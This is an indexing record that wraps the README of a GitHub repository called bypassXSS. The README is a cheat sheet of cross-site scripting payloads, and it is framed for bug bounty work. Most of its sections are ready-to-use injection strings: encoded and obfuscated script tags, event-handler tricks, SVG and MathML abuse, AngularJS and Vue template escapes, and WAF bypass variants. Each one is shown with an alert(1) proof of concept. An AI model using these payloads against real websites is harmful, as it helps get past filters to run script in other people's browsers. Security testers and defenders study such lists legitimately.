{"id":30063921,"url":"https://github.com/ero-hack/bypassxss","last_synced_at":"2026-02-08T13:39:11.238Z","repository":{"id":306993404,"uuid":"1027970861","full_name":"ERO-HACK/bypassXSS","owner":"ERO-HACK","description":"A curated collection of advanced XSS bypass techniques, including WAF evasions, framework-specific payloads, and real-world bug bounty cases.","archived":false,"fork":false,"pushed_at":"2025-07-28T20:37:47.000Z","size":13,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-07-28T22:21:48.285Z","etag":null,"topics":["bugbounty","bypass","dork","erohack","xss","xss-attacks","xss-bypass","xss-dorks"],"latest_commit_sha":null,"homepage":"https://erohack.site","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ERO-HACK.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-07-28T20:19:23.000Z","updated_at":"2025-07-28T20:40:44.000Z","dependencies_parsed_at":"2025-07-28T22:22:24.537Z","dependency_job_id":"56ed38d9-031f-4536-8b57-9ffda8e7ac5a","html_url":"https://github.com/ERO-HACK/bypassXSS","commit_stats":null,"previous_names":["ero-hack/bypassxss"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/ERO-HACK/bypassXSS","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ERO-HACK%2FbypassXSS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ERO-HACK%2FbypassXSS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ERO-HACK%2FbypassXSS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ERO-HACK%2FbypassXSS/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ERO-HACK","download_url":"https://codeload.github.com/ERO-HACK/bypassXSS/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ERO-HACK%2FbypassXSS/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":269366841,"owners_count":24405246,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-08T02:00:09.200Z","response_time":72,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bypass","dork","erohack","xss","xss-attacks","xss-bypass","xss-dorks"],"created_at":"2025-08-08T04:49:31.152Z","updated_at":"2026-02-08T13:39:06.219Z","avatar_url":"https://github.com/ERO-HACK.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Advanced Cross-Site Scripting (XSS) Bypass Techniques\n\n\u003e **Mastering Filters, WAFs, and Real-World Exploitation**\n\n---\n\n## ๐Ÿ“˜ Introduction\n\nCross-Site Scripting (XSS) remains one of the most prevalent and dangerous vulnerabilities in modern web applications. Despite improvements in input sanitization, CSP headers, and WAFs, attackers consistently find creative ways to bypass restrictions and execute scripts. This document presents a deep-dive into advanced XSS bypass techniques, grounded in real-world bug bounty cases and research.\n\n---\n\n## ๐Ÿงญ Table of Contents\n\n1. [Introduction](#-introduction)\n2. [Types of XSS Filters](#-types-of-xss-filters)\n3. [Encoding-Based Bypasses](#-encoding-based-bypasses)\n4. [Event Handler \u0026 DOM Tricks](#-event-handler--dom-tricks)\n5. [HTML5 Abuse \u0026 Weird Tags](#-html5-abuse--weird-tags)\n6. [JavaScript Context Escapes](#-javascript-context-escapes)\n7. [WAF Bypass Techniques](#-waf-bypass-techniques)\n8. [Framework-Specific Payloads](#-framework-specific-payloads)\n9. [CSP Misconfigurations](#-csp-misconfigurations)\n10. [Advanced Obfuscation Techniques](#-advanced-obfuscation-techniques)\n11. [Case Studies from Bug Bounties](#-case-studies-from-bug-bounties)\n12. [Tools for Testing \u0026 Automation](#-tools-for-testing--automation)\n13. [Payload Repository](#-payload-repository)\n14. [Final Notes](#-final-notes)\n15. [References](#-references)\n\n---\n\n## ๐Ÿ” Types of XSS Filters\n\n* Input Filters (client-side / server-side)\n* Output Filters (context-based)\n* HTML Sanitizers (DOMPurify, xss-filters)\n* WAFs (Cloudflare, Akamai, AWS WAF)\n\n---\n\n## ๐Ÿงฌ Encoding-Based Bypasses\n\n```html\n\u003cscript\u003e\u003cscript\\x3Ealert(1)\u003c/script\u003e\n\u003csvg/onload=\u0026#x61;\u0026#x6c;\u0026#x65;\u0026#x72;\u0026#x74;(1)\u003e\n\u003ciframe src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003e\u003c/iframe\u003e\n```\n\n---\n\n## ๐Ÿง  Event Handler \u0026 DOM Tricks\n\n```html\n\u003cdiv onpointerover=\"alert(1)\"\u003eHover me\u003c/div\u003e\n\u003cinput onfocus=alert(1) autofocus\u003e\n\u003ca href=\"javascript:alert(1)\"\u003eClick me\u003c/a\u003e\n```\n\n---\n\n## ๐Ÿงช HTML5 Abuse \u0026 Weird Tags\n\n```html\n\u003csvg\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/svg\u003e\n\u003cmath\u003e\u003cmi//xlink:href=\"javascript:alert(1)\"\u003e\u003c/math\u003e\n\u003cdetails open ontoggle=alert(1)\u003e\n```\n\n---\n\n## ๐Ÿงฉ JavaScript Context Escapes\n\n```js\nvar data = \"\u003cinput value='\" + user + \"'\u003e\";\n// Payload: ' onfocus=alert(1) autofocus='\n\nJSON.parse('{\"user\":\"\u003cimg src=x onerror=alert(1)\u003e\"}')\n```\n\n---\n\n## ๐Ÿงฑ WAF Bypass Techniques\n\n* Double Encoding:\n\n```html\n\u003cscript%20%0a\u003ealert(1)\u003c/script\u003e\n```\n\n* Tag Confusion:\n\n```html\n\u003c\u003cscript\u003escript\u003ealert(1)\u003c/script\u003e\n```\n\n* Mixed Context Injection\n* Non-Standard Quotes, Spaces, Comments\n\n---\n\n## โš™๏ธ Framework-Specific Payloads\n\n### AngularJS\n\n```html\n{{constructor.constructor('alert(1)')()}}\n```\n\n### React\n\nEscape JSX via `dangerouslySetInnerHTML`\n\n### Vue.js\n\n```html\n{{['a'].pop().constructor('alert(1)')()}}\n```\n\n---\n\n## ๐Ÿ›ก๏ธ CSP Misconfigurations\n\n* Open `script-src` or `unsafe-inline`\n* Trusted `data:` URIs\n* Using `script` inside SVG or iframe\n\n---\n\n## ๐ŸŒ€ Advanced Obfuscation Techniques\n\n```html\n\u003cscript\u003e\u003c!--alert(1)//--\u003e\u003c/script\u003e\n\u003cscript\u003eeval(\"al\"+\"ert(1)\")\u003c/script\u003e\n\u003csvg\u003e\u003cdesc\u003e\u003c![CDATA[\u003cscript\u003ealert(1)\u003c/script\u003e]]\u003e\u003c/desc\u003e\u003c/svg\u003e\n```\n\n---\n\n## ๐Ÿงพ Case Studies from Bug Bounties\n\nโœ”๏ธ **Case #17 (2024)**: Bypassed client-side regex using `\u003csvg\u003e\u003cscript xlink:href=\"data:text/javascript,alert(1)\"\u003e\u003c/script\u003e`\nโœ”๏ธ **Private Program (2025)**: AngularJS sandbox escape using `{{constructor.constructor('alert(1)')()}}`\n\n---\n\n## ๐Ÿงช Tools for Testing \u0026 Automation\n\n* [XSStrike](https://github.com/s0md3v/XSStrike)\n* [Dalfox](https://github.com/hahwul/dalfox)\n* [BugHunter](https://github.com/erohack/bughunter) *(by EroHack)*\n* Custom Payload Generators\n\n---\n\n## ๐Ÿ’ฃ Payload Repository\n\n```\npayloads/\nโ”œโ”€โ”€ waf-bypass.txt\nโ”œโ”€โ”€ dom-based.txt\nโ”œโ”€โ”€ unicode-encodings.txt\nโ”œโ”€โ”€ framework-specific/\nโ”‚ โ”œโ”€โ”€ angular.txt\nโ”‚ โ”œโ”€โ”€ react.txt\nโ”‚ โ””โ”€โ”€ vue.txt\nโ””โ”€โ”€ csp-bypass.txt\n```\n\n---\n\n## ๐Ÿงพ Final Notes\n\n* Always test across browsers.\n* CSP headers are not always reliable.\n* Validate both reflection and execution.\n* Automate with caution โ€” manual inspection is key.\n\n---\n\n## ๐Ÿ”— References\n\n* [OWASP XSS Cheat Sheet](https://owasp.org/www-community/xss)\n* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n* [PortSwigger XSS Bypasses](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)\n* [HackerOne Writeups](https://hackerone.com/hacktivity)\n\n---\n\n**Author:** [Shayan from EroHack](https://github.com/ERO-HACK)\n**Telegram:** [Join Telegram](https://t.me/erohack0)\n**License:** MIT\n**Last Update:** July 2025\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fero-hack%2Fbypassxss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fero-hack%2Fbypassxss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fero-hack%2Fbypassxss/lists"}